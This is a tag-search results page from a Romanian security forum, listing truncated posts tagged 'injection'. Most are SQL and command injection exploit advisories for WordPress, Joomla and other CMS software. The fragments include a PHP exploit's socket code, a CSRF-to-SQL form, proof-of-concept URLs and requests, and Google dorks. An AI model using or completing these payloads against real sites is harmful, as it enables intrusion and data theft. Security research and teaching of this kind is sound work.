Jump to content

Search the Community

Showing results for tags 'injection'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. A complete guide to SQL Injection in which you will design your own lab and learn to attack it. Pentesting + Hacking + SQLI Page: SQL Injection Master Course Price: €337
  2. A command injection is a class of vulnerabilities where the attacker can control one or multiple commands that are being executed on a system. This post will go over the impact, how to test for it, defeating mitigations, and caveats. Before diving into command injections, let’s get something out of the way: a command injection is not the same as a remote code execution (RCE). The difference is that with an RCE, actual programming code is executed, whereas with a command injection, it’s an (OS) command being executed. In terms of possible impact, this is a minor difference, but the key
  3. In This Tutorial We Will Learn , 1:Checking Vulnerability Using Diffirent Methods. 2:Balancing Our Query 3:integer Based SQL Injection 4:String Based SQL Injection Read Here !! Welcome To RAi Jee Official Blog: SQL Injection- Basics Of SQLi Part-1
  4. BSQL Hacker BSQL hacker is a nice SQL injection tool that helps you perform a SQL injection attack against web applications. This tool is for those who want an automatic SQL injection tool. It is especially made for Blind SQL injection. This tool is fast and performs a multi-threaded attack for better and faster results. It supports 4 different kinds of SQL injection attacks: Blind SQL Injection Time Based Blind SQL Injection Deep Blind (based on advanced time delays) SQL Injection Error Based SQL Injection This tool works in automatic mode and can extract most of the information from the data
  5. <?php /* OutPut: #[+] Author: TUNISIAN CYBER #[+] Script coded BY: Egidio Romano aka EgiX #[+] Title: Open-Letters Remote PHP Code Injection Vulnerability #[+] Date: 19-04-2015 #[+] Vendor: http://www.open-letters.de/ #[+] Type: WebAPP #[+] Tested on: KaliLinux (Debian) #[+] CVE: #[+] Twitter: @TCYB3R #[+] Egix's Contact: n0b0d13s[at]gmail[dot]com #[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png OL-shell> */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die( "\n[
  6. ###################### # Exploit Title : Wordpress Ajax Store Locator <= 1.2 SQL Injection Vulnerability # Exploit Author : Claudio Viviani # Vendor Homepage : WordPress - Ajax Store Locator - Wordpress | CodeCanyon # Software Link : Premium # Dork Google: inurl:ajax-store-locator # index of ajax-store-locator # Date : 2015-03-29 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox ###################### # Info: The "sl_dal_searchlocation_cbf" ajax function is affected from SQL Injection vulnerability "StoreLocation" var is not sanitized # PoC
  7. __ ___ ___ ___ ___ ___ ___ /\_\ __ _ /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\ /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/> </ \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\ \/____/\/___/ \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ { v0.1b } +-- Automated All-in-One OS Command Injection and Exploitation Tool Copyright © 2015 Anastasios Stasinopoulos (@ancst) +-- General Information Commix (short for [comm]and njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web
  8. #Vulnerability title: Wordpress plugin Simple Ads Manager - Multiple SQL Injection #Product: Wordpress plugin Simple Ads Manager #Vendor: https://profiles.wordpress.org/minimus/ #Affected version: Simple Ads Manager 2.5.94 and 2.5.96 #Download link: https://wordpress.org/plugins/simple-ads-manager/ #CVE ID: CVE-2015-2824 #Author: Le Hong Minh (minh.h.le@itas.vn) & ITAS Team ::PROOF OF CONCEPT:: ---SQL INJECTION 1--- + REQUEST: POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firef
  9. Advisory: SQLi-vulnerabilities in aplication CMS WebDepo Affected aplication web: Aplication CMS WebDepo (Release date: 28/03/2014) Vendor URL: http://www.webdepot.co.il Vendor Status: 0day ========================== Vulnerability Description: ========================== Records and client practice management application CMS WebDepo suffers from multiple SQL injection vulnerabilitie ========================== Technical Details: ========================== SQL can be injected in the following GET GET VULN: wood=(id) $wood=intval($_REQUEST['wood']) ========================== SQL injection
  10. ################################################################################################## #Exploit Title : Wordpress Plugin 'Business Intelligence' Remote SQL Injection vulnerability #Author : Jagriti Sahu AKA Incredible #Vendor Link : https://www.wpbusinessintelligence.com #Download Link : https://downloads.wordpress.org/plugin/wp-business-intelligence-lite.1.6.1.zip #Date : 1/04/2015 #Discovered at : IndiShell Lab #Love to : error1046 ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi #####################################################################
  11. [+]Title: Joomla Contact Form Maker v1.0.1 Component - SQL injection vulnerability [+]Author: TUNISIAN CYBER [+]Date: 29/03/2015 [+]Vendor: http://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/contact-form-maker [+]Type:WebApp [+]Risk:High [+]Overview: Contact Form Maker v1.0.1 suffers, from an SQL injection vulnerability. [+]Proof Of Concept: 127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL Source
  12. Sunt multi care nu stiu ce este, dar la l-au vazut in aplicare in diferite tutoriale de mysql injection. De aici il puteti descarca https://addons.mozilla.org/ro/firefox/addon/hackbar/ . Si un mic tutorial de folosire :
  13. ################################################################################################## #Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability #Author : Jagriti Sahu AKA Incredible #Vendor Link : Joomla Random Article Demo-Web Dorado #Date : 22/03/2015 #Discovered at : IndiShell Lab #Love to : error1046 ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ################################################################################################## //////////////////////// /// Overview: //////////////////////// joomla comp
  14. ################################################################################################## #Exploit Title : Joomla Spider FAQ component SQL Injection vulnerability #Author : Manish Kishan Tanwar AKA error1046 #Vendor Link : http://demo.web-dorado.com/spider-faq.html #Date : 21/03/2015 #Discovered at : IndiShell Lab #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi #Discovered At : Indishell Lab ################################################################################################## ////////////////////
  15. # Affected software: subrion # Type of vulnerability: csrf to sql injection # URL: http://demo.subrion.org # Discovered by: Provensec # Website: http://www.provensec.com #version v3.3.0 # Proof of concept no csrf protection on database form which made subrion to vulnerable to database injection vuln parameter query poc: <html> <body> <form action="http://demo.subrion.org/admin/database/" method="POST"> <input type="hidden" name="query" value="SELECT * FROM `sbr301_albums` `id` " /> <input type="hidden" name="table" value="sbr301_albums"
  16. # Affected software: Mambo # Type of vulnerability: csrf to sql injection # URL: http://source.mambo-foundation.org/ # Discovered by: Provensec # Website: http://www.provensec.com #version 4.6.5 # Proof of concept no csrf token were used on sql query form so attacker can leverage csrf to execute sql query on admin end screenshot http://prntscr.com/6gk265 POST /mambo/administrator/index2.php HTTP/1.1 Host: demo.opensourcecms.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Acce
  17. Title: WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection Version/s Tested: 1.7.3.3 Patched Version: 1.7.4 CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C) CVSSv2 Temporal Score: 7 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C) WPVULNDB: https://wpvulndb.com/vulnerabilities/7841 Description: WordPress SEO by Yoast is a popular WordPress plugin (wordpress-seo) used to improve the Search Engine Optimization (SEO) of WordPress sites. The latest version at the time of writing (1.7.3.3) has been found to be affected by two authenticated (admin, editor or author user) Blin
  18. ========================================================================================== Instant v2.0 SQL Injection Vulnerability ========================================================================================== :-------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Instant v2.0 SQL Injection Vulnerability : # Date : 10th March 2015 : # Author : X-Cisadane : # CMS Name : Instant v2.0 (another OverCoffee production) : # CMS Developer : overcoffee.com : # Version : 2.0 : # Category :
  19. Introducere Aplicatiile web folosesc foarte mult bazele de date pentru a aduna datele necesare si ale folosii la buna lor functionare . De multi ani, bazele de date relationale sunt tehnologia preferata pentru gestionarea datelor, dar in ultimul timp, au inceput sa iasa solutii organizate in structuri XML . Daca DB-urile relationale erau interogate folosind limbajul SQL, DB-urile XML folosesc XPath pentru a efectua query . Asa cum in limbajul SQL exista vulnerabilitati, exista si in XPath . In particular XPath injection, care ne permite sa injectam sintaxe XPath in internul request-ului, pe c
  20. Document Title: =============== Data Source: Scopus CMS - SQL Injection Web Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1436 Release Date: ============= 2015-02-25 Vulnerability Laboratory ID (VL-ID): ==================================== 1436 Common Vulnerability Scoring System: ==================================== 8.9 Abstract Advisory Information: ============================== An independent security team of the vulnerability laboratory discovered a critical sql injection web vulnerability in the official Data Source
  21. Services Affected: OpenCRM from Software Add-ons - Adding Value to Your Business Threat Level: High Severity: High CVSS Severity Score: 8.0 Impact type: Complete confidentiality, integrity and availability violation. Vulnerability: (3) Error-Based SQL Injection Vulnerabilities (2) Time-Based Blind SQL Injection Vulnerabilities Vendor Overview OpenCRM is a Software as a Service (SaaS) Customer Relationship Management solution. A leading OpenCRM software, and a true alternative to Salesforce, and other SaaS hosted CRM providers. Proof of Concept: https://demo.opencrm.co.uk:443/index.php?action
  22. Vantage Point Security Advisory 2014-007 ======================================== Title: Symantec Encryption Management Server - Remote Command Injection ID: VP-2014-007 Vendor: Symantec Affected Product: Symantec Encryption Gateway Affected Versions: < 3.2.0 MP6 Product Website: http://www.symantec.com/en/sg/gateway-email-encryption/ Author: Paul Craig <paul[at]vantagepoint[dot]sg Summary: --------- Symantec Gateway Email Encryption provides centrally managed email encryption to secure email communications with customers and partners regardless of whether or not recipients have their
  23. Hello all you have to visit the website . We established a website error to the website over the world . common errors such as SQL injection, Cross-site Scripting (XSS), Local File inclusion, Remote File Inclusion, Bug. Sincerely thank you trace our website. © Vulnerability VN 2015 - All Rights Reserved Share 230 Website SQL injection Link Here: Vulnerability VN
  24. [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+]Exploit Title : Invem CMS SQL INJECTION Vulnerability [+] [+]Exploit Author : Ashiyane Digital Security Team [+] [+]Vendor Homepage: http://www.invem.com/
×
×
  • Create New...